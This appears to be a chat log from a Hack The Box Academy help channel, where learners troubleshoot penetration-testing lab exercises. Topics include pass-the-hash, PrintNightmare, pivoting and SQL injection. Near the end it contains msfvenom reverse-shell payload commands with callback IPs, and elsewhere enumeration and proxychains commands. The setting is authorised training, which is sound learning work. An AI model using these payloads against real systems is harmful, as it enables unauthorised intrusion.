So if -w 30 is not working, maybe try -w 60 or more

lusty root
#

hi everyone, how hard is cpts examwaz

misty reef
# brisk drift cause on my machine i've that :

Also, if smtp-user-enum continues to give you 0 results, remember that there are other ways to enumerate SMTP users. Even if you haven't covered them in the module, you know that Nmap has scripts, or you can try an appropriate Metasploit module. Sometimes one tool fails where another succeeds due to how they handle timeouts or specific server responses.

jade moon
fathom pendant
bronze arrow
#

Hi everyone! Can anyone help with the Password Attack - Pass the Hash - question 4? Why is it that when I connect via RDP as Administrator and then use David’s hash in Mimikatz for PtH, I can access David’s shared folder, but when I connect via RDP directly using David’s hash, the share is not accessible?

Also, why does the whoami command still show Administrator even though I performed Pass-the-Hash (PtH) for David?

unique rune
#

Hello guys am stuck in this nmap hard lab for the past 3 days can someone help me

gray yacht
#

Try a different endpoint.

spare fossil
gray yacht
clever knoll
#

anyone experienced in cookie hijacking, cuz need help

royal saddle
#

Hi guys, I am on module/143/section/1484. I am trying to request a TGT using gettgtpkinit.py followind the examples, but I am getting

Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

the lab should be configured to make it possible, anyone else getting this?

left needle
#

Hi I have a question, regarding ExtraSids attack is it required to use the SID of enterprise admin group to compromise the parent domain or is it for root domain like can I use domain admin SID if it's not the root domain just a parent domain

spare fossil
brisk drift
#

@unique rune I sent u a private message if u need me for the Nmap Hard Lab

gray yacht
#

And you triggered it with the correct endpoint? I'm going to have to remove some of these posts as it's Tier 2 material. You can DM me.

spare fossil
gray yacht
spare fossil
hasty mauve
#

Someone DM'd me for help and I pressed the ignore button by mistake, sorry kek

vast cairn
#

ok. So in the WIndows Privesc module, working on kernel exploits, and so far I cannot get any of the examples to work. PrintNightmare allowed me to create a new user, and I can see it's got Administrator privilege when I run net user, but I can't switch to it.

and then I was able to run the hivenightmare to pull back the SAM hashes, but it says that the files are saved to c:\windows\temp but I don't have permission to access that folder.

finally, I was not able to get the maintenanceservice.exe reverse shell to work. I have all the configs properly on the malicious file, I was able to replace the mozilla service file, but then the reverse shell won't connect.

scenic arrow
#

Hey all. I'm working through Attacking Common Applications - Web Vuln with Thick-Client. I'm trying to understand where the 10.10.10.74 IP comes from? When I try to log into the fatty client and monitor the traffic with Wireshark, I'm not getting that IP anywhere, unless I'm doing something wrong.

potent delta
#

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

coarse pine
#

you can not do anything about it

bronze arrow
vagrant pine
#

In the enumerating password policies section of the AD module this section says minimum password length when domain is created is 7. Where are they getting this number from? The enum4linux output says minimum password length is 8 and doesn’t mention about the default length when domain is created.

spare fossil
dusk holly
#

but they actually didn't mention it anywhere i think

hexed oyster
#

OK, what do I do. I'm absolutely getting nowhere with 'Attacking Common Applications -> Exploiting Web Vulnerabilities in Thick-Client Applications'

modest vigil
#

this the skills assessment of sql injection intro is there something i did wrong or is there a problem with HTB?

hexed oyster
#

either the thing doesn't run, the modifications aren't doing what they're intended to. There's no explanation as to why or what we're doing so I have no idea how to debug it or otherwise help myself out of this mess. What should I do?

#

I thought I could just 'muscle through it' but this is getting worse and worse.

hexed oyster
hexed oyster
modest vigil
#

this is the normal output i get

modest vigil
hexed oyster
modest vigil
#

this is microsoft edge with no burpsuite

hexed oyster
#

OK, I don't know. I thought I could help with that one and I cannot. I'm sorry.

modest vigil
#

thats sad i am going to do another module till then

#

you should do that too

#

go take an easier one like a break

hexed oyster
#

Looks like that might be the play for both of us.

modest vigil
#

yes

#

like why does HTB SHOVE parrot OS down our throat around every corner like most of us have kali

rotund trellis
#

I feel like I need a 4-year degree in computer science with a Java specialty to fully understand the Attacking Common Application 'Exploiting Web Vulnerabilities in Thick-Client Applications'. I even watched the IppSec video for 'fatty'. My background is heavy on network/servers and not much in programming, so not sure if there are any other supplemental resources, especially if there is a lot of programming in the cpts exam.

hexed oyster
modest vigil
#

y'all are making me scared of whats to come in my HTB journey 😨

hexed oyster
#

99% of HTB content is waaay better than this.

modest vigil
hexed oyster
#

just know that Java and javascript are different.

#

javascript takes many syntactic inspirations from java, but beyond that, they're really not related.

modest vigil
#

yes hence the "and"

hexed oyster
#

I only point it out because many people I've come across don't understand that.

#

But, yes, understanding both of those languages would be a major benefit.

#

Also, if you've got the motivation; The C Programming language. So many languages build off of its principles that it is very much in your interest to have an undestanding of that one.

#

Especially for lower level exploitation techniques such as buffer overflows and the like.

modest vigil
#

thanks i knew that i needed to understand assembly for reverse engineering but this is the first time i hear of C

tranquil moat
#

Hello everyone, currently doing file transfers module and the question is:
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
I've RDPed into the Windows target and run the commands i attached to this message, but i manage to transfer the file but not actually get the hash the module wants...
May anyone help?

modest vigil
tranquil moat
#

How do i set them? I'm real bad with windows lol

modest vigil
#

icacls "path here" /grant YOURUSERHERE:R

#

i need to study windows tbh

tranquil moat
#

me too, i'm really comfortable with linux but i hate windows

tranquil moat
modest vigil
#

it seems u are running on powershell for it to be as close as possible to linux correct?

royal saddle
modest vigil
tranquil moat
#

gimme a sec the rdp service crashed i'm moving the file again

modest vigil
#

$acl = Get-Acl "C:\Users\User\Desktop\file.txt"
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule("User","Read","Allow")
$acl.AddAccessRule($rule)
Set-Acl "C:\Users\User\Desktop\file.txt" $acl

#

run this instead

#

you are using powershell

#

powershell is diffrent than normal cmd

tranquil moat
#

I've set the read permission but it still says the same thing

modest vigil
#

ooooh

safe star
modest vigil
#

that

safe star
#

It turns into a directory instead of a file

tranquil moat
#

damn

#

i was using tab and didn't even though about it

#

lemme try rq

safe star
#

Wait it is a directory

#

Is there a another file inside there?

modest vigil
#

its a .txt

tranquil moat
#

it's a freaking directoryu

safe star
#

It has d

tranquil moat
#

the actual file is inside that

#

I GOT IT

safe star
#

Lol directories with extensions

tranquil moat
#

thanks guys

modest vigil
#

so wait

#

i am confused

tranquil moat
#

i am a dumb ass and was trying to get the directory hash

modest vigil
#

is it a directory and what changed if it was a directory

safe star
#

Wym

modest vigil
#

oh so you were pointing it to the directory instead of the file

safe star
#

The directory was named with .txt it just looks like a file

tranquil moat
#

oh my bad i just revelaed the response

safe star
#

Did you name that directory?

tranquil moat
#

yeah i don't know why while i was moving the file using ftp i specified the output to be .txt

#

so i wwas trying to get the hash of it but as it was a zip i would obviously get a directory

modest vigil
#

metasploit module so easy

hazy grotto
#

Anybody having issues with loading pwnbox instances?

modest vigil
#

nevermind the CLI is litrally just connected pwnbox

vagrant pine
rotund vine
#

Hello I'm having issue in AEN module

#

Is it not working fine??

#

The instances are not opening

#

Or take forever to open

scenic arrow
hexed oyster
#

@scenic arrow can I dm you?

scenic arrow
cunning fern
#

can someone explain how, on footprinting smtp, |||sudo smtp-user-enum -M RCPT -U footprinting-wordlist.txt -t 10.129.23.157 -v || gives no results but |||sudo smtp-user-enum -M RCPT -U footprinting-wordlist.txt -t 10.129.23.157 -v -w 20|| does?

autumn rune
#

i have this problem can you help me bro
└─$ proxychains4 smbclient -L //172.16.119.10/ -U 'nexura.htb/hwilliam'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:9050 ... timeout
[proxychains] Strict chain ... 127.0.0.1:9050 ... timeout
do_connect: Connection to 172.16.119.10 failed (Error NT_STATUS_CONNECTION_REFUSED)
i don't know were is the problem i configured the file proxy good and i do a lot of think to fix this pblm and it 's doesn't work in Skills Assessment - Password Attacks

hot cliff
jovial walrus
#

as-rep roasting is not present in AD attacks module ?

waxen totem
#

It's under the Miscellaneous Misconfigurations section

vast cairn
#

Hey I'm on the kernel exploits for windows priv escalation and I'm stuck on this. I don't know why this exploit isn't giving me the right permissions for the file

#

I"m expecting it to give me winlpe-ws02\htb-student:(F) but... it's not

#

Has anyone else ever had this issue?

jovial walrus
dense lava
jovial walrus
#

I thought it covers everything

dense lava
jovial walrus
dense lava
#

It might have silver ticket in there I'm not sure. If that module covered everything there wouldnt be much point to the rest of the AD modules

dusk holly
autumn pilot
brisk drift
#

Hey Guys, i would need some help for the cours IMAP / POP3 in the footprinting module, it's for the 5th question " find the admin email ", i try enumerate everything i could but i didn't find it. Ofc it's not a bug and i'm missing something, if someone could help me with a hint or something please

dusk holly
# brisk drift Hey Guys, i would need some help for the cours IMAP / POP3 in the footprinting m...

the section did not showed how to retrieve Email Body, you can check HTB Forums for a lot of people referring to various sources on how to retrieve it, one of them is https://forum.hackthebox.com/t/footprinting-imap-pop3/250254/22
if you still can't get it, you can DM me

waxen totem
dusk holly
waxen totem
dusk holly
brisk drift
dusk holly
cosmic jay
#

Stuck on what should be a very easy question, not sure if there is an issue with the question or with me.

Question: What is the content of the first line in the healthcheck.log file on the Windows target?

Only 1 file with the given name on the target:

john@WIN01 C:\Users\john>powershell "Get-ChildItem -Path C:\ -Filter 'healthcheck.log' -Recurse -ErrorAction SilentlyContinue

Directory: C:\

Mode LastWriteTime Length Name


-a---- 2/6/2026 4:14 AM 849628 healthcheck.log

first line from what I can tell:

PS C:\Users\john> cat C:\healthcheck.log
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%

PS C:\Users\john> gc C:\healthcheck.log -TotalCount 1
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%

copy/pasting the line is not the correct answer, just the CPU usage part is not the answer, just the part preceding the - is not the answer, I'm not sure what I have done wrong. I am definitely on the correct target, as the second confirmation of the first line (using gc) was done on a fresh ssh to the target ip in the module for safety.

waxen totem
cosmic jay
pseudo kiln
#

anyone around for a question on injection attacks, section "LDAP - Data Exfiltration & Blind Exploitation" ?

peak falcon
#

Have the same problem, any solution?

cyan veldt
lusty terrace
#

the Web Attack skill assessment was fun besides finding the user to escalate to....

#

I gave up on that part after able to do everything, updating password of others and such

#

my dumbdumb was just reading the username

#

.....

lusty terrace
#

Thank you i just wanted to rant

coarse pine
#

oh okay

fathom moss
#

Hi,I’m having issues in network foundation section in CJCA with What manages multiple cell towers in cellular networks? (Format: three words) question where i put in Base Station Controllers it keeps giving me incorrect answer. Please Let me know where I went wrong

tidal bay
#

do you guys having issues when using rdp to windows hosts ? its just works really bad with me for a long time whether I use different network or mine

hushed island
#

Hello world, I'm currently doing the SOC path and I'm stuck on the "Detection and Analyis part 1" module. The password they provide does not work when I try to authenticate to the IP with the provided user. Can anyone help?

quick granite
#

To those who have taken the CPTS exam, did you guys encounter the "clock skew too great" error?

#

I am going through the Attacking Enterprise Networks module and nothing is fixing this error. I've tried the following and nothing has fixed it. I am thinking that I will need to restart the whole environment, which really sucks because I am so deep in and would suck even more if it happened on the exam.

sudo timedatectl set-ntp false
sudo ntpdate -u <ip>
sudo rdate -n <ip>

fathom pendant
#

I forget the syntax but ik you can use faketime

quick granite
#

I tried it, but it didn't work. Resetting the target fixed it...

coarse pine
#

hello

scenic parcel
#

anyone tried to write a bash script for WebAttacks final SA?
I've completed the module and SA, but have a question about my script

olive depot
#

I am doing the pivoting module, got huge issues using xfreerdp on my own VM i can see the connection going on, using ssh forwarding, then trying to use proxychains4 with xfreerdp to connect troguht the pivot host.

Any tips? šŸ™‚

waxen totem
whole nexus
rapid wharf
#

Anyone can help?

hybrid oriole
rapid wharf
#

I always use ntpdate but seems to not work for me with proxychains

gritty light
steel token
#

Hi guys I have just started pen test path and I cannot run commands or ping IPs mentioned in the notes. I am using pwn can anyone help

cloud urchin
#

You spawn the target and use that IP, not what's in the notes

steel token
#

Like there is no option to spawn the target. I am not taking about machines or labs. This pen testing path in academy

waxen totem
steel token
#

Pen testing getting started page 7 service scanning

waxen totem
#

looks like there's a target to me

steel token
#

Let me check that

vast cairn
#

I'm on the Kernel exploits for Windows Privilege Escalation, and this step of the guide doesn't seem to work

#

I don't know why the exploit is not showing my user's entry in icacls

#

This is the 10th time or so I"ve tried this

waxen totem
# vast cairn

You doing this as the new local admin user you created?

#

only one of the shown exploits will actually work iirc

vast cairn
#

Am I supposed to do the Invoke-Nightmare stuff before I run this CVE? THe way the question is presented, I read it as "try all 3 and see which one works"... I've been successful before making that admin user, but I can't switch to it so I gave up trying to do that.

waxen totem
vast cairn
#

Ok... Yeah, I haven't been able to get any of them to work

waxen totem
vast cairn
#

how do you switch to the user once you make it?

waxen totem
#

Wait no nvm it's the other one HiveNightmare

waxen totem
vast cairn
waxen totem
vast cairn
vast cairn
#

ĀÆ_(惄)_/ĀÆ

gritty light
#

try this

runas /env /profile /user:hacker powershell
vast cairn
gritty light
#

One sec spinning up the module now

#

sorry my VM froze,

but @waxen totem that the attacks may not be there, like the point is to try all three even if only one of them works

It does mention This privileged file write needs to be chained with another vulnerability, such as UsoDllLoader or DiagHub to load the DLL and escalate our privileges. However, the UsoDllLoader technique may not work if Windows Updates are pending or currently being installed, and the DiagHub service may not be available.

check the service

Get-CimInstance -ClassName Win32_Service | Where-Object { $_.Name -eq "DiagHub" }   
#

other than that idk

vast cairn
#

SO I restarted the device a third time, and it worked this time

#

but even with having Administrator group membership, it doesn't let me have access to C:\Users\Administrators\Desktop

tulip copper
#

[RESOLVED, use ligolo-ng] Doing the AD module Skills Assessment Part1 got the admin hash via DCSync although I can't access DC01 like evil-winrm connects and then dies after I type the command. Doing this last question (Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.)

#

I tried resetting the lab etc. I will try switch vpns now though.

#

I'm doing all the pivoting via metasploit/meterpreter as I used it to do the reverse shell.

#

[RESOLVED, use ligolo-ng] I think I might have configured both the socks proxy and port forward šŸ¤¦ā€ā™‚ļø (although I would assume that it wouldn't matter as you will use either technique not both?)

sudden cloud
#

Hey guys! I'm stuck on an exercise in Password Attack/Pass the Ticket (PtT) from Linux.
I'm trying to get the NTLM hash from the keytab file with the tool KeyTabExtract.py, but it only gives me the AES-256

#

With it I could potentially forge the TGT ticket and going with a Pass the Hash attack, but if I'm not wrong I'd need a windows box with Rubeus or Mimikatz, and in this exercise they didn't give us any. Also all of this looks suspiciously hard

#

I think it's a bug and I have to reset the box and do everything again. But if you have any suggetions I'd appreciate them!!

tulip copper
#

Check the other keytab file in that directory šŸ™‚

tulip copper
tulip copper
#

[RESOLVED, use ligolo-ng] continues to timeout 😮

jovial walrus
#

Is misusing DCOM present in ad enum & attacks?

dusk holly
jovial walrus
dusk holly
jovial walrus
dusk holly
swift aspen
#

Hi everyone,

since Thursday I’ve been stuck in the Attacking Common Applications module because the systems in the Questions section take forever to spawn and then respond so slowly that they’re basically unusable. This particularly affects the Splunk and PRTG parts.

A few days ago there was an announcement about technical issues, but it’s marked as resolved now. My VPN connection is up and stable, and I can ping the targets without any problems. For the Splunk questions, I also considered that a VHOST configuration might be required, but even with that in mind the systems are still extremely sluggish.

Are there any known issues at the moment? Or is there simply very high demand right now?
Up until now, Hack The Box Academy has always worked flawlessly for me, so this is pretty frustrating.

Thanks in advance for any help šŸ™

acoustic owl
swift aspen
pseudo kiln
#

Anyone around for a question on Injection Attacls - Exploitation of PDF Generation Vulnerabilities?

#

nvm I think I figured it out

rapid wharf
#

Does netexec/crackmapexec work for anyone with chisel SOCK proxy?

#

If i target one specific port with port forwarding it works, but doesn’t work with socks proxy

fallen arrow
#

Hey, I am doing the PentestInNutshell module, Windows Target, and I have added the user to the administrators group however, I still don't have access to the C:\Users\Administrator folder, am I missing something?

rapid wharf
#

You may have not added it correctly , check if it is in the administrators group with ā€œnet user <user>ā€

fallen arrow
#

When I check, it is there. And it keeps being there since it is injected in the code of the scheduled task

signal chasm
#

how can i give some feedback for a specific module?
i'll just shoot it out here:
Windows skill assessment in the module windows fundamental...
just finished it. Bad thing: those steps 1-8 are poorly described in my opinion. I feel a bit more explanation could have helped me. For example: I need to create a group. And then change permission of Files. So I assumed, since I created a new group, I will modifiy the permission of the newly created group. However, I noticed that, I needed to change permission of an other group. Good things: The solution helps a lot and was needed in my case. Loved the red arrows pointing exactly where I need to press.

sudden cloud
#

I'm still struggling with it (PtT from Linux) tho... I can't access the dc01 shares even if I try both the ccache file available for the user Julio!

candid bough
fallen arrow
cedar void
cedar void
thorn agate
#

hi I’m feeling desperate.. Before starting, this is briefly about cracking a password with John the Ripper. I understood the whole theoretical principle. Now below there is a question: ā€œFind a password using single mode.ā€ At first, I thought I had to connect to a system, then find the users in passwd for example, or go to shadow to find a hash and then use John on that list.

Then I opened the terminal with the instance provided in HTB. After researching, I realized that I did not need to connect to any system, but just crack the hash. I tried john --single to crack the password, but I found nothing.

Now the next question asks me to use wordlist mode, but I only have the username. Where am I supposed to find the hash? I really do not understand the exercise, and I have been stuck on it for days. Please, I need some help. An why it doesn“t work with the single mode from john altough the exercise say try it with this mode. I tried to chang the wordlist so using the rockyou list and it doesn“t work with booth of them

dusk holly
analog oasis
#

can someone help with this
RDP and SOCKS Tunneling with SocksOverRDP
the proxifier doesn't catch any traffic

west zodiac
#

I was doing some labs. Tell me this: if you’ve run BloodHound through proxychains, or if you have to run it in this kind of case, do you usually transfer the BloodHound binary to the target and run it from there? Or how do you usually do it?

The public‑facing IP is a web machine, so LDAP and similar services won’t be available for authentication there. Pivoting is mandatory. Because of that, nxc --bloodhound is timing out, while everything else is working fine.

lusty terrace
#

anyone doing the Attacking common applications ~ Application Discovery & Enumeration and doing the eyewitness scan met with this. I tried curling just the header it works but curling the entire page met with hanging ~.~

#

I did add the vhosts to my /etc/hosts file ..

#

it seems like I could only curl the default vhost and not other vhosts

#
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1    localhost
255.255.255.255    broadcasthost
::1             localhost
10.129.30.250 app.inlanefreight.local dev.inlanefreight.local drupal-dev.inlanefreight.local drupal-qa.inlanefreight.local drupal-acc.inlanefreight.local drupal.inlanefreight.local blog.inlanefreight.local```
#

Any suggestions would be great

dusk holly
#

module: SQL injection fundamentals skills assessment
i was able to successfully create an account, but after that i tried couple of potentially vulnerable injection parameters, but none of them worked, would appreciate a nudge

jovial walrus
#

can I copy the tools provided on windows and linux machines in AD enum&attacks module? I wish to have a copy on my machine.

fast quest
#

Hey guys, windows evasion SA 2 can anyone give me a nudge i tried two ways

  1. Reverse shell execution via VBscript
  2. Read the content from the user who run the file vbs file and write the content to C:\Windows\Tasks \flag.txt but access denied while opening

is there any other possible way

haughty fiber
#

Attacking Common Applications PRTG section. I can't get code execution to work. Can someone help

cloud urchin
#

@jovial walrus Please take care not to post content from modules above tier 0

unique rune
#

Guys I still need help with the hard nmap lab can someone help me

brittle citrus
brittle citrus
brittle citrus
unique rune
thorn agate
dusk holly
#

The same applies for linux

thorn agate
# dusk holly You don't, you don't have to have AD or windows environment to get AES or NTLM h...

I understood the concept well. I obtained the hash and saved it in a file called hash.txt, then I ran john hash.txt, but I can’t find anything. Then the second exercise only says: Use wordlist-mode with rockyou.txt to crack the RIPEMD-128 password. I don’t understand anything. I’ve been stuck on this small exercise for days, even though I already understood all the concepts with John the Ripper.

dusk holly
#

@gray yacht have you done the new Skills assessment for the SQL injection fundamentals module

elder prawn
#

hi can anybody explain

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.222.128 LPORT=4447 -f exe -o shell.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.159 LPORT=1338 -f exe -o shell.exe

why does the second one work when the first one doesn't?

thorn agate
#

sorry I“m a beginner

dusk holly
thorn agate
#

i mean i“m a beginner in HtB i understood much things but i can“t solve the problem. I don“t think the problem is about getting back to the background ...i thank you for your help. I will figure out how to solve it

hasty mauve